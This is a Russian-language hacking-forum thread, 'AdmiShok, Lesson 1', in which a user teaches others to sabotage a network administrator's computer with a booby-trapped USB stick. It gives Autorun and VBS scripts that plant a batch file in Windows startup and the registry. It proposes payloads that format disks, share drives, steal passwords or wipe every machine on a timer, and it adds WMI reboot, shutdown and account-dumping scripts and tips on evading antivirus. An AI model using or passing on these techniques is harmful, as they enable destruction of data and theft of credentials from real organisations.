terminal-s52

Объявление

Администрация форума не несет никакой ответственности за действия пользователей! Уважаемые пользователи всю информацию и софт вы используете на свой страх и риск! Приятного пребывания на форуме!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » terminal-s52 » Хакинг » AdmiShok. Урок 1 - от Archangel' a

AdmiShok. Урок 1 - от Archangel' a

Страница: 1

Сообщений 1 страница 20 из 20

1

  • Автор: Archangel
  • Активный участник
  • Зарегистрирован: 2008-01-10
  • Приглашений: 0
  • Сообщений: 183
  • Уважение: [+18/-1]
  • Позитив: [+88/-7]
  • Провел на форуме:
    1 день 15 часов
  • Последний визит:
    2008-09-14 20:24:05

В нескольких темах писали, что мол в большинстве заведений закрыты USB флешки и что вообщем с машинками ничего не сделать. Взламывать их пол беды, но вопрос в том надо ли это. Ведь все гораздо проще, че кажется...

Скачайте пару файликов и с умным и радостным видом подойдите к админу протянув вашу флешку для скидывания информации.

Разумеется её нужно сначала подготовить. итак:

Записываем на флешку Autorun.inf и скрипт, который подгонит ваши файлы в автозагрузку. Автор скрипта - я (он очень простой : [Особенно для знающих VBS]) ).

Option Explicit
Dim oShell, oShortCut, sStartupPath, File
Set oShell = CreateObject("Wscript.Shell")
sStartupPath = oShell.SpecialFolders("AllUsersStartup")
Set oShortCut = oShell.CreateShortcut(sStartupPath & "\MyName.lnk")
oShortCut.Hotkey = "CTRL+SHIFT+C"
oShortCut.TargetPath = "C:\Deistvie.bat"
oShortCut.Save

Этот простенький скрипт запишет ваши файлы с флешки - в автозагрузку админа (Это обычная автозагрузка, желающие (Читай "знающие"), разумеется пропишут все в скрытую автозагрузку (ниже об этом)...).

Что может быть в этих файлах:

1. Бат" ник, который отформатирует диск админа
2. Скрипт, который "расшарит" все диски админа по стеи (т.е. с любого компа в локалке все что есть у админа станет Ваше)
3. Троян, который перешлет вам на mail или на комп все его пароли
4. Поменять ему все пароли...
5. Скрипт, который сработает через 10 (1..&) дней, после чего отформатирует все компы по локалке одновременно...

... И т.д. Здесь нужна лишь фантазия и умение.

Вот например скрипт, который скопирует ваш файл в C:\Windows:

Dim FileSysObject, File
Set FileSysObject = CreateObject ("Scripting.FileSystemObject")
Set File = FileSysObject.GetFile(WScript.ScriptFullName)
File.Copy ("c:\windows\Deystvie.bat")

Этот скрипт скопирует ваши файлы в автозагрузку для загрузки вместе с Windows всегда. (Файл должен быть на компе у админа - скопирован заранее - можно\нужно скриптом выше):

Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ _
CurrentVersion\RunServices\virus", "С:\windows\Deystvie.bat"

Не запутайтесь при составлении скрипта, помните флешку нужно замаскировать (Это благо несложно). И еще первый скрипт VBS скопирует в автозагрузку ярлык из C:\Deistvie.bat - (Значит ваш файл должен быть там...)

***

VBS+Reestr+CMD+Mosgi = Admin Shok and Smert' (Формула любого антиадмина. На самом деле в этой статье нет хакинга, как и на этом сайте :) , но пункты 2-5 уже намного ближе к заветной мечте ...

P.S. Тема на мой взгляд элементарна, но большие возможности и много побочных проблем. Если что не понятно - пишите в ЭТУ тему. Скрипт лучше сделать один (склеить и желательно закодировать).
P.S. Статья не законченна, писал очень быстро - (возможны ошибки) Время дорого...

0

2

  • Автор: Archangel
  • Активный участник
  • Зарегистрирован: 2008-01-10
  • Приглашений: 0
  • Сообщений: 183
  • Уважение: [+18/-1]
  • Позитив: [+88/-7]
  • Провел на форуме:
    1 день 15 часов
  • Последний визит:
    2008-09-14 20:24:05

Позже могу предоставить скрипты троянов и коней на VBS и немного на JS. и даже быть может научу кодировать, скрывать скрипты, делать их невосприимчивыми и незаметными антивирусами любой защиты. Но это в дальнейшем - пока хватит и этого. На сегодня всё. Всем спасибо, все свободны... :)

+1

3

  • Автор: ozia
  • Администратор
  • ozia
  • Зарегистрирован: 2007-11-30
  • Приглашений: 0
  • Сообщений: 794
  • Уважение: [+81/-2]
  • Позитив: [+62/-2]
  • Провел на форуме:
    11 часов 52 минуты
  • Последний визит:
    2010-08-03 11:53:21

+1 красиво) но... если б ты хоть один скрипт свой розшифровал) напиши подробно если можешь...
многим наверное твоя статья покажется непонятной...
можешь розписать некоторые самые розпростарненные команды?
если сможешь сакажи! я напишу список) именно VBS
1. форматирование диска (без вопроса о подтверждении)
2. удаление всех папок на диске (вместе с файлами) ВСЁ ЧТО КАСАЕТСЯ УДАЛЕНИЯ
3. создание файла в заданной директории (блокнота допустим)
4. перезагрузка/выключение
5. выдача сообщения на экран
6. скопировать файл откуда-то - куда-то
7. что-то с рабочим столом
какие-то вот такие простенькие функции... ок?

0

4

  • Автор: Archangel
  • Активный участник
  • Зарегистрирован: 2008-01-10
  • Приглашений: 0
  • Сообщений: 183
  • Уважение: [+18/-1]
  • Позитив: [+88/-7]
  • Провел на форуме:
    1 день 15 часов
  • Последний визит:
    2008-09-14 20:24:05

Ссылка на самый лучший учебник по VBS:

http://www.askit.ru/custom/progr_admin/ … n_plan.htm

Ссылка для скачивания (Нелегальна):

http://depositfiles.com/files/3059960

0

5

  • Автор: Archangel
  • Активный участник
  • Зарегистрирован: 2008-01-10
  • Приглашений: 0
  • Сообщений: 183
  • Уважение: [+18/-1]
  • Позитив: [+88/-7]
  • Провел на форуме:
    1 день 15 часов
  • Последний визит:
    2008-09-14 20:24:05

Все вопроосы есть в учебнике. Помимо форматирования и удаления. Все что с рабочим столом делается исключительно через реестр:

Скрытие всех элементов на Рабочем столе

Создай ключ типа DWORD NoDesktop со значением 1 в разделе
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

...

Есть информация на "Сером форуме" : http://forum.script-coding.info/viewtopic.php?id=147

0

6

  • Автор: Archangel
  • Активный участник
  • Зарегистрирован: 2008-01-10
  • Приглашений: 0
  • Сообщений: 183
  • Уважение: [+18/-1]
  • Позитив: [+88/-7]
  • Провел на форуме:
    1 день 15 часов
  • Последний визит:
    2008-09-14 20:24:05

Форматирование НОРМАЛЬНОЕ - делается через .Bat Можно из .VBS открыть .Bat в невидимом режиме.

0

7

  • Автор: Archangel
  • Активный участник
  • Зарегистрирован: 2008-01-10
  • Приглашений: 0
  • Сообщений: 183
  • Уважение: [+18/-1]
  • Позитив: [+88/-7]
  • Провел на форуме:
    1 день 15 часов
  • Последний визит:
    2008-09-14 20:24:05

Итак: Расшифровка скрипта:

Dim oShell, oShortCut, sStartupPath

' Dim определяет (описывает) переменные, здесь их 3 : oShell, oShortCut, sStartupPath

Set oShell = CreateObject("Wscript.Shell")

' Set присваивает значение переменной oShell, создаем обьект Shell

sStartupPath = oShell.SpecialFolders("AllUsersStartup")

'  Указываем специальную директорию - автозагрузка всех пользователей.

Set oShortCut = oShell.CreateShortcut(sStartupPath & "\MyName.lnk") '

oShortCut.Hotkey = "CTRL+SHIFT+C"

'  Привязка функциональных клавиш ярлыку - использовать здесь не обязательно

oShortCut.TargetPath = "C:\Deistvie.bat"

' Указываем путь и имя вашего батника

oShortCut.Save

'Сохраняем его.

Вот сообственно и все. Знания нужны минимальные. Все достаточно просто.Чуть позже описание всех файлов в подобной флешки для снесения Windows.

Отредактировано Archangel (2008-01-13 10:57:21)

0

8

  • Автор: Archangel
  • Активный участник
  • Зарегистрирован: 2008-01-10
  • Приглашений: 0
  • Сообщений: 183
  • Уважение: [+18/-1]
  • Позитив: [+88/-7]
  • Провел на форуме:
    1 день 15 часов
  • Последний визит:
    2008-09-14 20:24:05

Создание любого файла:

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.CreateTextFile("C:\YourName.bat")

0

9

  • Автор: Archangel
  • Активный участник
  • Зарегистрирован: 2008-01-10
  • Приглашений: 0
  • Сообщений: 183
  • Уважение: [+18/-1]
  • Позитив: [+88/-7]
  • Провел на форуме:
    1 день 15 часов
  • Последний визит:
    2008-09-14 20:24:05

Перезагрузка компьютера:

strComputer = "atl-dc-01"
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate,(Shutdown)}!\\" & _
        strComputer & "\root\cimv2")

Set colOperatingSystems = objWMIService.ExecQuery _
    ("Select * from Win32_OperatingSystem")

For Each objOperatingSystem in colOperatingSystems
    objOperatingSystem.Reboot()
Next

0

10

  • Автор: Archangel
  • Активный участник
  • Зарегистрирован: 2008-01-10
  • Приглашений: 0
  • Сообщений: 183
  • Уважение: [+18/-1]
  • Позитив: [+88/-7]
  • Провел на форуме:
    1 день 15 часов
  • Последний визит:
    2008-09-14 20:24:05

Выключение компьютера:

strComputer = "."
Set objWMIService = GetObject_
    ("winmgmts:{impersonationLevel=impersonate,(Shutdown)}\\" & _
        strComputer & "\root\cimv2")

Set colOperating Systems = objWMIService.ExecQuery _
    ("Select * from Win32_OperatingSystem")

For Each objOperatingSystem in colOperatingSystems
    objOperatingSystem.Win32Shutdown(1)
Next

0

11

  • Автор: Archangel
  • Активный участник
  • Зарегистрирован: 2008-01-10
  • Приглашений: 0
  • Сообщений: 183
  • Уважение: [+18/-1]
  • Позитив: [+88/-7]
  • Провел на форуме:
    1 день 15 часов
  • Последний визит:
    2008-09-14 20:24:05

Удаление файла:

Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFile("C:\Windows\YourName.sys")

0

12

  • Автор: Archangel
  • Активный участник
  • Зарегистрирован: 2008-01-10
  • Приглашений: 0
  • Сообщений: 183
  • Уважение: [+18/-1]
  • Позитив: [+88/-7]
  • Провел на форуме:
    1 день 15 часов
  • Последний визит:
    2008-09-14 20:24:05

Выдача сообщения на экран:

MsgBox ("....................Your TEXT................")

0

13

  • Автор: ozia
  • Администратор
  • ozia
  • Зарегистрирован: 2007-11-30
  • Приглашений: 0
  • Сообщений: 794
  • Уважение: [+81/-2]
  • Позитив: [+62/-2]
  • Провел на форуме:
    11 часов 52 минуты
  • Последний визит:
    2010-08-03 11:53:21

во! теперь ты настоящий учитель! +1
зы: а сейчас прокручу вверх и буду читать внимательно)

+1

14

  • Автор: Archangel
  • Активный участник
  • Зарегистрирован: 2008-01-10
  • Приглашений: 0
  • Сообщений: 183
  • Уважение: [+18/-1]
  • Позитив: [+88/-7]
  • Провел на форуме:
    1 день 15 часов
  • Последний визит:
    2008-09-14 20:24:05

Например можно запустить скрипт, который создаст текстовый файл, запишет в него нужные команды, переименует в .BAT и запустит. Причем антивирус будет молчать.

Отредактировано Archangel (2008-01-13 13:45:42)

0

15

  • Автор: Thief
  • Активный участник
  • Зарегистрирован: 2007-12-18
  • Приглашений: 0
  • Сообщений: 29
  • Уважение: [+1/-0]
  • Позитив: [+0/-0]
  • Провел на форуме:
    6 часов 51 минуту
  • Последний визит:
    2008-05-22 00:54:06

Archangel
Снимаю шляпу. Приведи примеры работы VBS c сетью. И что там насчёт шифрования )

0

16

  • Автор: Archangel
  • Активный участник
  • Зарегистрирован: 2008-01-10
  • Приглашений: 0
  • Сообщений: 183
  • Уважение: [+18/-1]
  • Позитив: [+88/-7]
  • Провел на форуме:
    1 день 15 часов
  • Последний визит:
    2008-09-14 20:24:05

За шляпу спасибо. Не подошла правда... :)

Насчет сети, так пожалуйста - у меня в коллекции всего полно. Скоро будет.

0

17

  • Автор: Archangel
  • Активный участник
  • Зарегистрирован: 2008-01-10
  • Приглашений: 0
  • Сообщений: 183
  • Уважение: [+18/-1]
  • Позитив: [+88/-7]
  • Провел на форуме:
    1 день 15 часов
  • Последний визит:
    2008-09-14 20:24:05

Этот скрипт выдает вам регистрационную информацию о всех пользователях на одном компьютере. За место точки указывайте имя компьютера - здесь и выше.

On Error Resume Next
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

Set colItems = objWMIService.ExecQuery _
    ("Select * from Win32_NetworkLoginProfile")

For Each objItem in colItems
    dtmWMIDate = objItem.AccountExpires
    strReturn = WMIDateStringToDate(dtmWMIDate)
    Wscript.Echo "Account Expires: " & strReturn
    Wscript.Echo "Authorization Flags: " & objItem.AuthorizationFlags
    Wscript.Echo "Bad Password Count: " & objItem.BadPasswordCount
    Wscript.Echo "Caption: " & objItem.Caption
    Wscript.Echo "CodePage: " & objItem.CodePage
    Wscript.Echo "Comment: " & objItem.Comment
    Wscript.Echo "Country Code: " & objItem.CountryCode
    Wscript.Echo "Description: " & objItem.Description
    Wscript.Echo "Flags: " & objItem.Flags
    Wscript.Echo "Full Name: " & objItem.FullName
    Wscript.Echo "Home Directory: " & objItem.HomeDirectory
    Wscript.Echo "Home Directory Drive: " & objItem.HomeDirectoryDrive
    dtmWMIDate = objItem.LastLogoff
    strReturn = WMIDateStringToDate(dtmWMIDate)
    Wscript.Echo "Last Logoff: " & strReturn
    dtmWMIDate = objItem.LastLogon
    strReturn = WMIDateStringToDate(dtmWMIDate)
    Wscript.Echo "Last Logon: " & strReturn
    Wscript.Echo "Logon Hours: " & objItem.LogonHours
    Wscript.Echo "Logon Server: " & objItem.LogonServer
    Wscript.Echo "Maximum Storage: " & objItem.MaximumStorage
    Wscript.Echo "Name: " & objItem.Name
    Wscript.Echo "Number Of Logons: " & objItem.NumberOfLogons
    Wscript.Echo "Password Age: " & objItem.PasswordAge
    dtmWMIDate = objItem.PasswordExpires
    strReturn = WMIDateStringToDate(dtmWMIDate)
    Wscript.Echo "Password Expires: " & strReturn
    Wscript.Echo "Primary Group ID: " & objItem.PrimaryGroupId
    Wscript.Echo "Privileges: " & objItem.Privileges
    Wscript.Echo "Profile: " & objItem.Profile
    Wscript.Echo "Script Path: " & objItem.ScriptPath
    Wscript.Echo "Setting ID: " & objItem.SettingID
    Wscript.Echo "Units Per Week: " & objItem.UnitsPerWeek
    Wscript.Echo "User Comment: " & objItem.UserComment
    Wscript.Echo "User Id: " & objItem.UserId
    Wscript.Echo "User Type: " & objItem.UserType
    Wscript.Echo "Workstations: " & objItem.Workstations
    Wscript.Echo
Next

Function WMIDateStringToDate(dtmWMIDate)
    If Not IsNull(dtmWMIDate) Then
    WMIDateStringToDate = CDate(Mid(dtmWMIDate, 5, 2) & "/" & _
         Mid(dtmWMIDate, 7, 2) & "/" & Left(dtmWMIDate, 4) _
             & " " & Mid (dtmWMIDate, 9, 2) & ":" & _
                 Mid(dtmWMIDate, 11, 2) & ":" & Mid(dtmWMIDate, 13, 2))
    End If
End Function

Фишка в том, что вы получите все данные указанного компьютера запустив этот скрипт. Но для этого необходимы права на этот компьютер (На главном компе у админа). Есть много других способов. Например расшарить любой комп и запустить скрипт удаленно, либо самому написать скрипт, который от имени админа на его компе запустит скрипт, ну и т.д. (ВАриантов - миллионы ...  ;) ).

+1

18

  • Автор: Archangel
  • Активный участник
  • Зарегистрирован: 2008-01-10
  • Приглашений: 0
  • Сообщений: 183
  • Уважение: [+18/-1]
  • Позитив: [+88/-7]
  • Провел на форуме:
    1 день 15 часов
  • Последний визит:
    2008-09-14 20:24:05

Thief

Что именно по сети. И сообственно какая сеть - локальная, глабальная и т.д.

0

19

  • Автор: LionASP
  • член команды
  • LionASP
  • Зарегистрирован: 2008-04-07
  • Приглашений: 0
  • Сообщений: 51
  • Уважение: [+4/-0]
  • Позитив: [+7/-0]
  • Пол: Мужской
  • Провел на форуме:
    21 час 44 минуты
  • Последний визит:
    2009-08-29 14:02:02
Archangel написал(а):

Например можно запустить скрипт, который создаст текстовый файл, запишет в него нужные команды, переименует в .BAT и запустит. Причем антивирус будет молчать.

Заманчиво =) Все начинаю VBS учить =)

+1

20

  • Автор: inname3
  • элита команды
  • inname3
  • Откуда: Москва
  • Зарегистрирован: 2008-07-03
  • Приглашений: 0
  • Сообщений: 215
  • Уважение: [+22/-0]
  • Позитив: [+40/-3]
  • Пол: Мужской
  • Возраст: 16 [2008-04-01]
  • Провел на форуме:
    12 часов 28 минут
  • Последний визит:
    2010-01-10 20:44:00
Archangel написал(а):

Ссылка на самый лучший учебник по VBS:
            http://www.askit.ru/custom/progr_admin/ … n_plan.htm
            Ссылка для скачивания (Нелегальна):
            http://depositfiles.com/files/3059960

У кого есть киньте заного сылку !

0

Страница: 1

Вы здесь » terminal-s52 » Хакинг » AdmiShok. Урок 1 - от Archangel' a